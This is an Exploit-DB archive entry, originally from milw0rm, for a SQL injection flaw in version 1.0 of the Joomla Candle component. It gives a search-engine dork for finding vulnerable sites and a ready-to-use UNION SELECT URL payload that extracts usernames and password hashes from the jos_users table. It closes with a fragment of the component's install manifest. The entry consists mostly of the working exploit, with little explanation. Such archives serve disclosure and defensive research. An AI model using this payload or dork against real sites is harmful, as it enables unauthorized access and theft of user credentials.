Joomla Component Candle 1.0 cID SQL Injection Vulnerability

2008-03-08T00:00:00
ID EDB-ID:5221
Type exploitdb
Reporter S@BUN
Modified 2008-03-08T00:00:00

Description

Joomla Component Candle 1.0 (cID) SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            #############################################
#
########### JOOMLA com_candle SQL Injection(cid)
#
#############################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
####
####MAiL : hackturkiye.hackturkiye@gmail.com
#
#############################################
#
##DORK 1 : allinurl:"com_candle"
#
#############################################
EXPLOIT :

index.php?option=com_candle&task=content&cID=-9999/**/union/**/select/**/0x3a,username,0x3a,password,0x3a,0x3a/**/from/**/jos_users/*

#############################################
################# S@BUN ####################
#############################################
######## hackturkiye.hackturkiye@gmail.com ######
#############################################

<mosinstall type="component" version="1.0.0">
	<name>Candle</name>
	<author>Son Vu</author>
	<creationDate>March 2007</creationDate>
	<copyright>(C) 2007 Open Source Matters. All rights reserved.</copyright>
	<license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>

	<authorEmail>sora4g@gmail.com</authorEmail>
	<authorUrl></authorUrl>
	<version>1.0.0</version>
	<description>Candle Component.</description>

# milw0rm.com [2008-03-08]